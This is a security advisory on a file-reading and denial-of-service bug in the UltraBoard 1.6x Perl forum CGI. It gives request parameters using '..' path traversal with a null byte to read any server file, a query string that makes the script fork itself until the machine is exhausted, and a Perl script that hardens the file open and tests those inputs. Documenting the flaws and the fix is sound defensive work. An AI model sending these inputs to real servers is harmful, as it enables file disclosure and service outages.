UltraBoard 1.6x - open any file bug



Vulnerability

    UltraBoard

Affected

    UltraBoard V1.6X

Description

    Rudi Carell found the following.  He found some interesting things in
    the "old" UltraBoard-Forum scripts (UltraBoard V 1.6).  By using the
    good old NullByte (\000) it's possible to open "any" file on the
    webserver (with its permissions) running the "UltraBoard"
    forum-software.  cgi-script:

        UltraBoard.pl || UltraBoard.cgi

    Variables:

        Action=PrintableTopic
        Post=[path_including_".."_to_any_file][***NULLBYTE***]
        Board=[valid_board]
        Idle=10
        Sort=0
        Order=Descend
        Page=0
        Session=

    hmm ... EOF

    Juan M. Bello Rivas added the following.  There's even more fun
    available with old versions of ultraboard (and latest beta of
    ultraboard 2000 is also vulnerable to this?).  You can bring the
    web server to its knees by issuing a request to the CGI like this:

        QUERY_STRING=Session=../UltraBoard.pl%00%7c

    It will start forking instances of  the CGI until it eats all  the
    resources of the machine.
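    Both reports above come down to the same Perl CGI habit: a request
    parameter is handed to a two-argument open(), so a trailing NUL lets
    the C-level open() ignore whatever suffix the script appended, and a
    trailing "|" turns the name into a command pipe.  The script below is
    an added illustration, not UltraBoard's own code; it shows how a
    hardened open for the Post parameter would look.  The data directory
    (a temporary one created in the script), the ".txt" naming and the
    function name safe_open_post are assumptions.

```perl
#!/usr/bin/perl
# Added illustration, not UltraBoard's code. The data directory is a
# temporary one created here; function and file names are assumed.
use strict;
use warnings;
use File::Spec;
use File::Temp qw(tempdir);
use Cwd qw(realpath);

my $BASE = tempdir(CLEANUP => 1);

# Constructed sample post file so the valid case has something to open.
{
    open(my $out, '>', File::Spec->catfile($BASE, 'topic42.txt')) or die $!;
    print $out "constructed post body\n";
    close $out;
}

# Vulnerable pattern (for contrast only, never executed here):
#   open(FH, "$BASE/$post") or die;
# With two-argument open, a trailing "\0" in $post makes the C-level open()
# stop at the NUL, discarding any suffix the script appended, and a trailing
# "|" makes Perl treat the name as a command to pipe from. The second report
# on this page (Session=../UltraBoard.pl%00%7c) is that pipe case: the script
# ends up spawning itself until the host runs out of resources.

sub safe_open_post {
    my ($post) = @_;

    # 1. Refuse NUL and other control bytes before anything else looks at them.
    return (undef, 'control byte in path') if $post =~ /[\x00-\x1f\x7f]/;

    # 2. Allow-list the token. Slashes, "..", "|", "<", ">" never reach open().
    return (undef, 'characters outside allow-list')
        unless $post =~ /\A[A-Za-z0-9_-]{1,64}\z/;

    # 3. Build the path and confirm the resolved file still lives under $BASE
    #    (covers symlinks dropped into the data directory too).
    my $path = File::Spec->catfile($BASE, "$post.txt");
    my $real = realpath($path);
    return (undef, 'no such post') unless defined $real && -f $real;
    return (undef, 'path escapes data directory')
        unless index($real, realpath($BASE) . '/') == 0;

    # 4. Three-argument open with an explicit read mode: the file name is
    #    data, never a mode prefix or a pipe.
    open(my $fh, '<', $real) or return (undef, "open failed: $!");
    return ($fh, undef);
}

# Constructed inputs: one legitimate post name and the shapes from the report.
for my $input ("topic42", "../UltraBoard.pl\0", "../UltraBoard.pl|", "topic42\0") {
    my ($fh, $err) = safe_open_post($input);
    (my $shown = $input) =~ s/\0/\\0/g;
    printf "%-22s -> %s\n", $shown, $fh ? 'opened' : "rejected: $err";
    close $fh if $fh;
}
```

    The allow-list in step 2 is what does most of the work; the NUL check
    in step 1 and the realpath comparison in step 3 are belt-and-braces
    for the case where a later change loosens that pattern.  Three-argument
    open with a fixed mode is the part that removes the pipe behaviour
    the second report relies on.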

Solution

    Newer version fixes this?

